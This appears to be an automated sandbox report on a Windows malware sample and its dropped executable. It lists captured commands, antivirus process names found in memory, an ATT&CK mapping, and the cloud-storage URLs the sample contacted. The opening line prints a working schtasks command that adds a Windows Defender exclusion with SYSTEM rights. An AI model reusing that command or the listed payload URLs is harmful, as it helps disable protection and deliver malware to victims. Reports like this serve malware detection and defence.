Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior

Source: C:\Users\user\Documents\J8daaU.exe

Code function: 8_2_00007FF6FCAEF750 cpuid

8_2_00007FF6FCAEF750

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior

Source: C:\Users\user\Documents\J8daaU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: svchost.exe, 00000006.00000002.2415557811.000001F5ACD02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KWatch.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: SuperKiller.exe
Source: Amcache.hve.54.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: Autoruns.exe
Source: Amcache.hve.54.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.54.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp, Amcache.hve.54.dr	Binary or memory string: MsMpEng.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: J8daaU.exe, 00000037.00000002.2413710220.000000EAE25FF000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: 360safe.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Safe.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413547290.000000EAE24FE000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: svchost.exe, 00000006.00000002.2415557811.000001F5ACD02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Windows Service	1 Windows Service	22 Masquerading	1 Credential API Hooking	271 Security Software Discovery	Remote Services	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	112 Command and Scripting Interpreter	1 Scheduled Task/Job	11 Process Injection	2 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Modify Registry	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Native API	Login Hook	1 Abuse Elevation Control Mechanism	31 Virtualization/Sandbox Evasion	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 DLL Side-Loading	11 Process Injection	LSA Secrets	133 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Abuse Elevation Control Mechanism	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Obfuscated Files or Information	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Gokod.763652.06.exe	17%	Virustotal		Browse
Gokod.763652.06.exe	17%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\4xCNoe\4xCNoe.exe	0%	ReversingLabs
C:\Program Files (x86)\u0syUl\u0syUl.exe	0%	ReversingLabs
C:\Users\user\Documents\J8daaU.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://xh4ffp.oss-cn-beijing.aliyuncs.com/d.gif	0%	Avira URL Cloud	safe
http://www.extensis.com/meta/FontSense/	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpges	0%	Avira URL Cloud	safe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/i.dat	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgstory	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51	0%	Avira URL Cloud	safe
http://prismstandard.org/namespaces/prismusagerights/2.1/	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgetCache	0%	Avira URL Cloud	safe
https://downloads.hawe.com/7/0/D7000TUV-de.pdf)	0%	Avira URL Cloud	safe
https://downloads.hawe.com/7/0/D7000E1-de.pdf)	0%	Avira URL Cloud	safe
http://jbotsim.sf.net/examples/bico.html)/S/URI	0%	Avira URL Cloud	safe
https://www.hawe.com/de-de/kontakt/kontaktsuche/)	0%	Avira URL Cloud	safe
https://downloads.hawe.com/5/4/D54881-de.pdf)	0%	Avira URL Cloud	safe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/a.gif	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgJv	0%	Avira URL Cloud	safe
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline	0%	Avira URL Cloud	safe
https://downloads.hawe.com/7/7/D7710TUEV-de.pdf)	0%	Avira URL Cloud	safe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002w~	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgbu	0%	Avira URL Cloud	safe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/c.gif	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1002E	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/drops.jpg	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/.o	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg?	0%	Avira URL Cloud	safe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/7-2476756634-1002	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/2	0%	Avira URL Cloud	safe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/s.jpg	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/om	0%	Avira URL Cloud	safe
https://downloads.hawe.com/3/7/D3726-de.pdf)	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpges	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/fo	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/7	0%	Avira URL Cloud	safe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/s.dat	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/Windows	0%	Avira URL Cloud	safe
https://downloads.hawe.com/7/7/D7710MV-de.pdf)	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/Windows	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgu.aliyuncs.com/	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/.a(	0%	Avira URL Cloud	safe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/v	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/e	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/al	0%	Avira URL Cloud	safe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/7-2476756634-1002	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/f.dat	0%	Avira URL Cloud	safe
https://nm25.oss-cn-hangzhou.aliyuncs.com/f.datjpgW_	0%	Avira URL Cloud	safe
https://downloads.hawe.com/5/4/B5488-de.pdf)	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sc-2pyl.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	118.178.60.98	true	false	unknown
sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	39.103.20.59	true	false	high
xh4ffp.oss-cn-beijing.aliyuncs.com	unknown	unknown	false	unknown
nm25.oss-cn-hangzhou.aliyuncs.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://xh4ffp.oss-cn-beijing.aliyuncs.com/d.gif	false	Avira URL Cloud: safe	unknown
https://xh4ffp.oss-cn-beijing.aliyuncs.com/i.dat	false	Avira URL Cloud: safe	unknown
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	false	Avira URL Cloud: safe	unknown
https://xh4ffp.oss-cn-beijing.aliyuncs.com/a.gif	false	Avira URL Cloud: safe	unknown
https://xh4ffp.oss-cn-beijing.aliyuncs.com/c.gif	false	Avira URL Cloud: safe	unknown
https://xh4ffp.oss-cn-beijing.aliyuncs.com/s.jpg	false	Avira URL Cloud: safe	unknown
https://nm25.oss-cn-hangzhou.aliyuncs.com/drops.jpg	false	Avira URL Cloud: safe	unknown
https://xh4ffp.oss-cn-beijing.aliyuncs.com/s.dat	false	Avira URL Cloud: safe	unknown
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	false	Avira URL Cloud: safe	unknown
https://nm25.oss-cn-hangzhou.aliyuncs.com/f.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.extensis.com/meta/FontSense/	Gokod.763652.06.exe	false	Avira URL Cloud: safe	unknown
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgstory	J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpges	J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	Gokod.763652.06.exe	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000002.00000003.1378896420.000002336DE67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395695861.000002336DE68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://dx.doi.org/10.1016/j.comcom.2011.09.008	Gokod.763652.06.exe	false		high
http://prismstandard.org/namespaces/prismusagerights/2.1/	Gokod.763652.06.exe	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.1.dr, qmgr.db.1.dr	false		high
http://dx.doi.org/10.1016/j.comcom.2011.09.008)/S/URI	Gokod.763652.06.exe	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000002.00000003.1379724150.000002336DE5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395600339.000002336DE44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380482497.000002336DE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395720938.000002336DE81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod.C:	edb.log.1.dr, qmgr.db.1.dr	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgetCache	J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000002.00000002.1395585730.000002336DE3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51	J8daaU.exe, 00000037.00000002.2413857794.000000EAE26F6000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26E8000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	J8daaU.exe, 00000037.00000002.2413857794.000000EAE26FE000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B8735D4000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26F6000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26E8000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bingmapsportal.com	svchost.exe, 00000002.00000002.1395519765.000002336DE13000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395585730.000002336DE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380482497.000002336DE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000001.00000003.1208743106.000001F3856C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	false		high
https://downloads.hawe.com/7/0/D7000TUV-de.pdf)	Gokod.763652.06.exe	false	Avira URL Cloud: safe	unknown
http://jbotsim.sf.net/examples/bico.html)/S/URI	Gokod.763652.06.exe	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 00000002.00000003.1379854194.000002336DE5D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.hawe.com/de-de/kontakt/kontaktsuche/)	Gokod.763652.06.exe	false	Avira URL Cloud: safe	unknown
https://downloads.hawe.com/7/0/D7000E1-de.pdf)	Gokod.763652.06.exe	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000002.00000002.1395559421.000002336DE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1378896420.000002336DE67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395695861.000002336DE68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline	Gokod.763652.06.exe	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=	svchost.exe, 00000002.00000003.1379724150.000002336DE5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395600339.000002336DE44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp	false		high
https://downloads.hawe.com/5/4/D54881-de.pdf)	Gokod.763652.06.exe	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000001.00000002.2416629749.000001F385400000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	Gokod.763652.06.exe	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000002.00000003.1380560951.000002336DE4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/	svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395625269.000002336DE59000.00000004.00000020.00020000.00000000.sdmp	false		high
https://xh4ffp.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002w~	Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://downloads.hawe.com/7/7/D7710TUEV-de.pdf)	Gokod.763652.06.exe	false	Avira URL Cloud: safe	unknown
https://dynamic.t	svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgJv	J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgbu	J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nm25.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1002E	J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nm25.oss-cn-hangzhou.aliyuncs.com/	J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B8735D4000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
